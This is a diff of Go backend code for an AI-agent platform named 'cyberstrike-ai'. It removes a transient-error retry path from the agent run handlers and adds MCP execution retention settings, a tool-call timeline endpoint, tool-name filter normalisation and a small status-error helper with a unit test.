&h.config.MultiAgent,
|
||||||
h.agent,
|
h.agent,
|
||||||
|
h.db,
|
||||||
h.logger,
|
h.logger,
|
||||||
conversationID,
|
conversationID,
|
||||||
|
h.conversationProjectID(conversationID),
|
||||||
curFinalMessage,
|
curFinalMessage,
|
||||||
curHistory,
|
curHistory,
|
||||||
roleTools,
|
roleTools,
|
||||||
@@ -238,30 +239,10 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if runErr == nil {
|
if runErr == nil {
|
||||||
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
|
|
||||||
transientRunAttempts = 0
|
|
||||||
timeoutCancel()
|
timeoutCancel()
|
||||||
break
|
break
|
||||||
}
|
}
|
||||||
|
|
||||||
handled, fatalErr := h.handleEinoTransientRetryContinue(
|
|
||||||
baseCtx, conversationID, result, runErr, &transientRunAttempts,
|
|
||||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
|
||||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
|
||||||
)
|
|
||||||
if handled {
|
|
||||||
mainIterationOffset += segmentMainIterationMax
|
|
||||||
timeoutCancel()
|
|
||||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
|
||||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
|
||||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
|
||||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
if fatalErr != nil {
|
|
||||||
runErr = fatalErr
|
|
||||||
}
|
|
||||||
|
|
||||||
cause := context.Cause(baseCtx)
|
cause := context.Cause(baseCtx)
|
||||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||||
@@ -286,8 +267,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
|||||||
"source": "interrupt_continue",
|
"source": "interrupt_continue",
|
||||||
})
|
})
|
||||||
mainIterationOffset += segmentMainIterationMax
|
mainIterationOffset += segmentMainIterationMax
|
||||||
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
|
|
||||||
transientRunAttempts = 0
|
|
||||||
timeoutCancel()
|
timeoutCancel()
|
||||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||||
@@ -418,21 +397,30 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
result, runErr := multiagent.RunEinoSingleChatModelAgent(
|
curHist := prep.History
|
||||||
taskCtx,
|
curMsg := prep.FinalMessage
|
||||||
h.config,
|
var result *multiagent.RunResult
|
||||||
&h.config.MultiAgent,
|
var runErr error
|
||||||
h.agent,
|
for {
|
||||||
h.logger,
|
result, runErr = multiagent.RunEinoSingleChatModelAgent(
|
||||||
prep.ConversationID,
|
taskCtx,
|
||||||
prep.FinalMessage,
|
h.config,
|
||||||
prep.History,
|
&h.config.MultiAgent,
|
||||||
prep.RoleTools,
|
h.agent,
|
||||||
progressCallback,
|
h.db,
|
||||||
chatReasoningToClientIntent(req.Reasoning),
|
h.logger,
|
||||||
h.projectBlackboardBlock(prep.ConversationID),
|
prep.ConversationID,
|
||||||
)
|
h.conversationProjectID(prep.ConversationID),
|
||||||
if runErr != nil {
|
curMsg,
|
||||||
|
curHist,
|
||||||
|
prep.RoleTools,
|
||||||
|
progressCallback,
|
||||||
|
chatReasoningToClientIntent(req.Reasoning),
|
||||||
|
h.projectBlackboardBlock(prep.ConversationID),
|
||||||
|
)
|
||||||
|
if runErr == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -64,10 +64,7 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
toolCount := toolCounts[name]
|
toolCount := toolCounts[name]
|
||||||
errorMsg := ""
|
errorMsg := externalMCPStatusError(h.manager, name, status)
|
||||||
if status == "error" {
|
|
||||||
errorMsg = h.manager.GetError(name)
|
|
||||||
}
|
|
||||||
|
|
||||||
result[name] = ExternalMCPResponse{
|
result[name] = ExternalMCPResponse{
|
||||||
Config: cfg,
|
Config: cfg,
|
||||||
@@ -115,20 +112,22 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// 获取错误信息
|
|
||||||
errorMsg := ""
|
|
||||||
if status == "error" {
|
|
||||||
errorMsg = h.manager.GetError(name)
|
|
||||||
}
|
|
||||||
|
|
||||||
c.JSON(http.StatusOK, ExternalMCPResponse{
|
c.JSON(http.StatusOK, ExternalMCPResponse{
|
||||||
Config: cfg,
|
Config: cfg,
|
||||||
Status: status,
|
Status: status,
|
||||||
ToolCount: toolCount,
|
ToolCount: toolCount,
|
||||||
Error: errorMsg,
|
Error: externalMCPStatusError(h.manager, name, status),
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// externalMCPStatusError 在 error/disconnected 状态下返回最近错误(含断连原因)。
|
||||||
|
func externalMCPStatusError(manager *mcp.ExternalMCPManager, name, status string) string {
|
||||||
|
if status != "error" && status != "disconnected" {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
return manager.GetError(name)
|
||||||
|
}
|
||||||
|
|
||||||
// AddOrUpdateExternalMCP 添加或更新外部MCP配置
|
// AddOrUpdateExternalMCP 添加或更新外部MCP配置
|
||||||
func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
||||||
var req AddOrUpdateExternalMCPRequest
|
var req AddOrUpdateExternalMCPRequest
|
||||||
|
|||||||
@@ -271,6 +271,16 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestExternalMCPStatusError(t *testing.T) {
|
||||||
|
manager := mcp.NewExternalMCPManager(zap.NewNop())
|
||||||
|
if got := externalMCPStatusError(manager, "x", "connected"); got != "" {
|
||||||
|
t.Fatalf("connected status should not return error, got %q", got)
|
||||||
|
}
|
||||||
|
if got := externalMCPStatusError(manager, "x", "connecting"); got != "" {
|
||||||
|
t.Fatalf("connecting status should not return error, got %q", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||||
router, handler, _ := setupTestRouter()
|
router, handler, _ := setupTestRouter()
|
||||||
|
|
||||||
|
|||||||
+191
-24
@@ -10,8 +10,10 @@ import (
|
|||||||
"time"
|
"time"
|
||||||
|
|
||||||
"cyberstrike-ai/internal/audit"
|
"cyberstrike-ai/internal/audit"
|
||||||
|
"cyberstrike-ai/internal/config"
|
||||||
"cyberstrike-ai/internal/database"
|
"cyberstrike-ai/internal/database"
|
||||||
"cyberstrike-ai/internal/mcp"
|
"cyberstrike-ai/internal/mcp"
|
||||||
|
"cyberstrike-ai/internal/monitor"
|
||||||
"cyberstrike-ai/internal/security"
|
"cyberstrike-ai/internal/security"
|
||||||
"github.com/gin-gonic/gin"
|
"github.com/gin-gonic/gin"
|
||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
@@ -19,12 +21,18 @@ import (
|
|||||||
|
|
||||||
// MonitorHandler 监控处理器
|
// MonitorHandler 监控处理器
|
||||||
type MonitorHandler struct {
|
type MonitorHandler struct {
|
||||||
mcpServer *mcp.Server
|
mcpServer *mcp.Server
|
||||||
externalMCPMgr *mcp.ExternalMCPManager
|
externalMCPMgr *mcp.ExternalMCPManager
|
||||||
executor *security.Executor
|
executor *security.Executor
|
||||||
db *database.DB
|
db *database.DB
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
audit *audit.Service
|
audit *audit.Service
|
||||||
|
monitorRetention *monitor.Service
|
||||||
|
}
|
||||||
|
|
||||||
|
// SetMonitorRetention wires MCP execution retention settings.
|
||||||
|
func (h *MonitorHandler) SetMonitorRetention(s *monitor.Service) {
|
||||||
|
h.monitorRetention = s
|
||||||
}
|
}
|
||||||
|
|
||||||
// SetAudit wires platform audit logging.
|
// SetAudit wires platform audit logging.
|
||||||
@@ -50,13 +58,14 @@ func (h *MonitorHandler) SetExternalMCPManager(mgr *mcp.ExternalMCPManager) {
|
|||||||
|
|
||||||
// MonitorResponse 监控响应
|
// MonitorResponse 监控响应
|
||||||
type MonitorResponse struct {
|
type MonitorResponse struct {
|
||||||
Executions []*mcp.ToolExecution `json:"executions"`
|
Executions []*mcp.ToolExecution `json:"executions"`
|
||||||
Stats map[string]*mcp.ToolStats `json:"stats"`
|
Stats map[string]*mcp.ToolStats `json:"stats"`
|
||||||
Timestamp time.Time `json:"timestamp"`
|
Timestamp time.Time `json:"timestamp"`
|
||||||
Total int `json:"total,omitempty"`
|
Total int `json:"total,omitempty"`
|
||||||
Page int `json:"page,omitempty"`
|
Page int `json:"page,omitempty"`
|
||||||
PageSize int `json:"page_size,omitempty"`
|
PageSize int `json:"page_size,omitempty"`
|
||||||
TotalPages int `json:"total_pages,omitempty"`
|
TotalPages int `json:"total_pages,omitempty"`
|
||||||
|
RetentionDays int `json:"retention_days,omitempty"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// Monitor 获取监控信息
|
// Monitor 获取监控信息
|
||||||
@@ -77,8 +86,8 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
|
|||||||
|
|
||||||
// 解析状态筛选参数
|
// 解析状态筛选参数
|
||||||
status := c.Query("status")
|
status := c.Query("status")
|
||||||
// 解析工具筛选参数
|
// 解析工具筛选参数(兼容 mcp__tool 与内部 mcp::tool)
|
||||||
toolName := c.Query("tool")
|
toolName := normalizeToolNameFilter(c.Query("tool"))
|
||||||
|
|
||||||
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
|
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
|
||||||
stats := h.loadStats()
|
stats := h.loadStats()
|
||||||
@@ -89,16 +98,24 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
c.JSON(http.StatusOK, MonitorResponse{
|
c.JSON(http.StatusOK, MonitorResponse{
|
||||||
Executions: executions,
|
Executions: executions,
|
||||||
Stats: stats,
|
Stats: stats,
|
||||||
Timestamp: time.Now(),
|
Timestamp: time.Now(),
|
||||||
Total: total,
|
Total: total,
|
||||||
Page: page,
|
Page: page,
|
||||||
PageSize: pageSize,
|
PageSize: pageSize,
|
||||||
TotalPages: totalPages,
|
TotalPages: totalPages,
|
||||||
|
RetentionDays: h.monitorRetentionDays(),
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (h *MonitorHandler) monitorRetentionDays() int {
|
||||||
|
if h.monitorRetention != nil {
|
||||||
|
return h.monitorRetention.RetentionDays()
|
||||||
|
}
|
||||||
|
return config.MonitorConfig{}.RetentionDaysEffective()
|
||||||
|
}
|
||||||
|
|
||||||
func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution {
|
func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution {
|
||||||
executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "")
|
executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "")
|
||||||
return executions
|
return executions
|
||||||
@@ -113,7 +130,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
|
|||||||
for _, exec := range allExecutions {
|
for _, exec := range allExecutions {
|
||||||
matchStatus := status == "" || exec.Status == status
|
matchStatus := status == "" || exec.Status == status
|
||||||
// 支持部分匹配(模糊搜索)
|
// 支持部分匹配(模糊搜索)
|
||||||
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName))
|
matchTool := toolNameFilterMatches(exec.ToolName, toolName)
|
||||||
if matchStatus && matchTool {
|
if matchStatus && matchTool {
|
||||||
filtered = append(filtered, exec)
|
filtered = append(filtered, exec)
|
||||||
}
|
}
|
||||||
@@ -143,7 +160,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
|
|||||||
for _, exec := range allExecutions {
|
for _, exec := range allExecutions {
|
||||||
matchStatus := status == "" || exec.Status == status
|
matchStatus := status == "" || exec.Status == status
|
||||||
// 支持部分匹配(模糊搜索)
|
// 支持部分匹配(模糊搜索)
|
||||||
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName))
|
matchTool := toolNameFilterMatches(exec.ToolName, toolName)
|
||||||
if matchStatus && matchTool {
|
if matchStatus && matchTool {
|
||||||
filtered = append(filtered, exec)
|
filtered = append(filtered, exec)
|
||||||
}
|
}
|
||||||
@@ -327,6 +344,124 @@ func (h *MonitorHandler) GetStats(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, stats)
|
c.JSON(http.StatusOK, stats)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// CallsTimelinePoint 调用趋势数据点
|
||||||
|
type CallsTimelinePoint struct {
|
||||||
|
T time.Time `json:"t"`
|
||||||
|
Total int `json:"total"`
|
||||||
|
Failed int `json:"failed"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// CallsTimelineSummary 调用趋势汇总
|
||||||
|
type CallsTimelineSummary struct {
|
||||||
|
TotalCalls int `json:"totalCalls"`
|
||||||
|
Peak int `json:"peak"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// CallsTimelineResponse 调用趋势响应
|
||||||
|
type CallsTimelineResponse struct {
|
||||||
|
Range string `json:"range"`
|
||||||
|
Points []CallsTimelinePoint `json:"points"`
|
||||||
|
Summary CallsTimelineSummary `json:"summary"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type callsTimelineConfig struct {
|
||||||
|
rangeKey string
|
||||||
|
duration time.Duration
|
||||||
|
bucketSize time.Duration
|
||||||
|
dailyBuckets bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func parseCallsTimelineRange(raw string) (callsTimelineConfig, bool) {
|
||||||
|
switch strings.TrimSpace(raw) {
|
||||||
|
case "24h":
|
||||||
|
return callsTimelineConfig{rangeKey: "24h", duration: 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true
|
||||||
|
case "30d":
|
||||||
|
return callsTimelineConfig{rangeKey: "30d", duration: 30 * 24 * time.Hour, bucketSize: 24 * time.Hour, dailyBuckets: true}, true
|
||||||
|
default:
|
||||||
|
return callsTimelineConfig{rangeKey: "7d", duration: 7 * 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func truncateToBucket(t time.Time, bucketSize time.Duration, dailyBuckets bool) time.Time {
|
||||||
|
if dailyBuckets {
|
||||||
|
y, m, d := t.Date()
|
||||||
|
return time.Date(y, m, d, 0, 0, 0, 0, t.Location())
|
||||||
|
}
|
||||||
|
return t.Truncate(bucketSize)
|
||||||
|
}
|
||||||
|
|
||||||
|
func buildCallsTimelinePoints(cfg callsTimelineConfig, buckets map[time.Time]struct{ total, failed int }) []CallsTimelinePoint {
|
||||||
|
now := time.Now()
|
||||||
|
start := truncateToBucket(now.Add(-cfg.duration), cfg.bucketSize, cfg.dailyBuckets)
|
||||||
|
end := truncateToBucket(now, cfg.bucketSize, cfg.dailyBuckets)
|
||||||
|
|
||||||
|
points := make([]CallsTimelinePoint, 0)
|
||||||
|
for current := start; !current.After(end); current = current.Add(cfg.bucketSize) {
|
||||||
|
val := buckets[current]
|
||||||
|
points = append(points, CallsTimelinePoint{
|
||||||
|
T: current,
|
||||||
|
Total: val.total,
|
||||||
|
Failed: val.failed,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return points
|
||||||
|
}
|
||||||
|
|
||||||
|
func (h *MonitorHandler) loadCallsTimeline(cfg callsTimelineConfig) []CallsTimelinePoint {
|
||||||
|
since := time.Now().Add(-cfg.duration)
|
||||||
|
bucketMap := make(map[time.Time]struct{ total, failed int })
|
||||||
|
|
||||||
|
if h.db != nil {
|
||||||
|
dbBuckets, err := h.db.LoadCallsTimeline(since, cfg.dailyBuckets)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Warn("从数据库加载调用趋势失败,回退到内存数据", zap.Error(err))
|
||||||
|
} else {
|
||||||
|
for _, b := range dbBuckets {
|
||||||
|
key := truncateToBucket(b.BucketTime, cfg.bucketSize, cfg.dailyBuckets)
|
||||||
|
entry := bucketMap[key]
|
||||||
|
entry.total += b.Total
|
||||||
|
entry.failed += b.Failed
|
||||||
|
bucketMap[key] = entry
|
||||||
|
}
|
||||||
|
return buildCallsTimelinePoints(cfg, bucketMap)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, exec := range h.mcpServer.GetAllExecutions() {
|
||||||
|
if exec == nil || exec.StartTime.Before(since) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
key := truncateToBucket(exec.StartTime, cfg.bucketSize, cfg.dailyBuckets)
|
||||||
|
entry := bucketMap[key]
|
||||||
|
entry.total++
|
||||||
|
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||||
|
entry.failed++
|
||||||
|
}
|
||||||
|
bucketMap[key] = entry
|
||||||
|
}
|
||||||
|
return buildCallsTimelinePoints(cfg, bucketMap)
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetCallsTimeline 获取 MCP 工具调用趋势
|
||||||
|
func (h *MonitorHandler) GetCallsTimeline(c *gin.Context) {
|
||||||
|
cfg, _ := parseCallsTimelineRange(c.Query("range"))
|
||||||
|
points := h.loadCallsTimeline(cfg)
|
||||||
|
|
||||||
|
summary := CallsTimelineSummary{}
|
||||||
|
for _, p := range points {
|
||||||
|
summary.TotalCalls += p.Total
|
||||||
|
if p.Total > summary.Peak {
|
||||||
|
summary.Peak = p.Total
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
c.JSON(http.StatusOK, CallsTimelineResponse{
|
||||||
|
Range: cfg.rangeKey,
|
||||||
|
Points: points,
|
||||||
|
Summary: summary,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
// DeleteExecution 删除执行记录
|
// DeleteExecution 删除执行记录
|
||||||
func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
|
func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
|
||||||
id := c.Param("id")
|
id := c.Param("id")
|
||||||
@@ -466,3 +601,35 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
|
|||||||
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
|
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
|
||||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// normalizeToolNameFilter 将模型侧 mcp__tool 转为内部存储用的 mcp::tool。
|
||||||
|
func normalizeToolNameFilter(name string) string {
|
||||||
|
name = strings.TrimSpace(name)
|
||||||
|
if name == "" {
|
||||||
|
return name
|
||||||
|
}
|
||||||
|
if strings.Contains(name, "::") {
|
||||||
|
return name
|
||||||
|
}
|
||||||
|
if idx := strings.Index(name, "__"); idx > 0 {
|
||||||
|
return name[:idx] + "::" + name[idx+2:]
|
||||||
|
}
|
||||||
|
return name
|
||||||
|
}
|
||||||
|
|
||||||
|
func toolNameFilterMatches(storedName, filter string) bool {
|
||||||
|
filter = strings.TrimSpace(filter)
|
||||||
|
if filter == "" {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
storedLower := strings.ToLower(storedName)
|
||||||
|
filterLower := strings.ToLower(filter)
|
||||||
|
if strings.Contains(storedLower, filterLower) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
normFilter := strings.ToLower(normalizeToolNameFilter(filter))
|
||||||
|
if normFilter != filterLower && strings.Contains(storedLower, normFilter) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return strings.Contains(strings.ReplaceAll(storedLower, "::", "__"), filterLower)
|
||||||
|
}
|
||||||
|
|||||||
@@ -136,7 +136,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
|
|
||||||
var cancelWithCause context.CancelCauseFunc
|
var cancelWithCause context.CancelCauseFunc
|
||||||
curFinalMessage := prep.FinalMessage
|
curFinalMessage := prep.FinalMessage
|
||||||
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
|
|
||||||
curHistory := prep.History
|
curHistory := prep.History
|
||||||
roleTools := prep.RoleTools
|
roleTools := prep.RoleTools
|
||||||
orch := strings.TrimSpace(req.Orchestration)
|
orch := strings.TrimSpace(req.Orchestration)
|
||||||
@@ -187,7 +186,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
|
|
||||||
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
|
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
|
||||||
var cumulativeMCPExecutionIDs []string
|
var cumulativeMCPExecutionIDs []string
|
||||||
var transientRunAttempts int
|
|
||||||
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
|
||||||
var mainIterationOffset int
|
var mainIterationOffset int
|
||||||
|
|
||||||
@@ -224,6 +222,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||||
|
taskCtxLoop = mcp.WithEinoExecuteRunRegistry(taskCtxLoop, h.tasks)
|
||||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||||
})
|
})
|
||||||
@@ -233,8 +232,10 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
h.config,
|
h.config,
|
||||||
&h.config.MultiAgent,
|
&h.config.MultiAgent,
|
||||||
h.agent,
|
h.agent,
|
||||||
|
h.db,
|
||||||
h.logger,
|
h.logger,
|
||||||
conversationID,
|
conversationID,
|
||||||
|
h.conversationProjectID(conversationID),
|
||||||
curFinalMessage,
|
curFinalMessage,
|
||||||
curHistory,
|
curHistory,
|
||||||
roleTools,
|
roleTools,
|
||||||
@@ -250,30 +251,10 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if runErr == nil {
|
if runErr == nil {
|
||||||
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
|
|
||||||
transientRunAttempts = 0
|
|
||||||
timeoutCancel()
|
timeoutCancel()
|
||||||
break
|
break
|
||||||
}
|
}
|
||||||
|
|
||||||
handled, fatalErr := h.handleEinoTransientRetryContinue(
|
|
||||||
baseCtx, conversationID, result, runErr, &transientRunAttempts,
|
|
||||||
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
|
|
||||||
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
|
|
||||||
)
|
|
||||||
if handled {
|
|
||||||
mainIterationOffset += segmentMainIterationMax
|
|
||||||
timeoutCancel()
|
|
||||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
|
||||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
|
||||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
|
||||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
if fatalErr != nil {
|
|
||||||
runErr = fatalErr
|
|
||||||
}
|
|
||||||
|
|
||||||
cause := context.Cause(baseCtx)
|
cause := context.Cause(baseCtx)
|
||||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||||
@@ -298,8 +279,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
|||||||
"source": "interrupt_continue",
|
"source": "interrupt_continue",
|
||||||
})
|
})
|
||||||
mainIterationOffset += segmentMainIterationMax
|
mainIterationOffset += segmentMainIterationMax
|
||||||
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
|
|
||||||
transientRunAttempts = 0
|
|
||||||
timeoutCancel()
|
timeoutCancel()
|
||||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||||
@@ -430,23 +409,32 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
|
|||||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
|
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
|
||||||
})
|
})
|
||||||
|
|
||||||
result, runErr := multiagent.RunDeepAgent(
|
curHist := prep.History
|
||||||
taskCtx,
|
curMsg := prep.FinalMessage
|
||||||
h.config,
|
var result *multiagent.RunResult
|
||||||
&h.config.MultiAgent,
|
var runErr error
|
||||||
h.agent,
|
for {
|
||||||
h.logger,
|
result, runErr = multiagent.RunDeepAgent(
|
||||||
prep.ConversationID,
|
taskCtx,
|
||||||
prep.FinalMessage,
|
h.config,
|
||||||
prep.History,
|
&h.config.MultiAgent,
|
||||||
prep.RoleTools,
|
h.agent,
|
||||||
progressCallback,
|
h.db,
|
||||||
h.agentsMarkdownDir,
|
h.logger,
|
||||||
strings.TrimSpace(req.Orchestration),
|
prep.ConversationID,
|
||||||
chatReasoningToClientIntent(req.Reasoning),
|
h.conversationProjectID(prep.ConversationID),
|
||||||
h.projectBlackboardBlock(prep.ConversationID),
|
curMsg,
|
||||||
)
|
curHist,
|
||||||
if runErr != nil {
|
prep.RoleTools,
|
||||||
|
progressCallback,
|
||||||
|
h.agentsMarkdownDir,
|
||||||
|
strings.TrimSpace(req.Orchestration),
|
||||||
|
chatReasoningToClientIntent(req.Reasoning),
|
||||||
|
h.projectBlackboardBlock(prep.ConversationID),
|
||||||
|
)
|
||||||
|
if runErr == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||||
}
|
}
|
||||||
|
|||||||
+144
-40
@@ -2,10 +2,8 @@ package handler
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"net/http"
|
"net/http"
|
||||||
"time"
|
|
||||||
|
|
||||||
"cyberstrike-ai/internal/database"
|
"cyberstrike-ai/internal/database"
|
||||||
"cyberstrike-ai/internal/storage"
|
|
||||||
|
|
||||||
"github.com/gin-gonic/gin"
|
"github.com/gin-gonic/gin"
|
||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
@@ -15,17 +13,15 @@ import (
|
|||||||
type OpenAPIHandler struct {
|
type OpenAPIHandler struct {
|
||||||
db *database.DB
|
db *database.DB
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
resultStorage storage.ResultStorage
|
|
||||||
conversationHdlr *ConversationHandler
|
conversationHdlr *ConversationHandler
|
||||||
agentHdlr *AgentHandler
|
agentHdlr *AgentHandler
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewOpenAPIHandler 创建新的OpenAPI处理器
|
// NewOpenAPIHandler 创建新的OpenAPI处理器
|
||||||
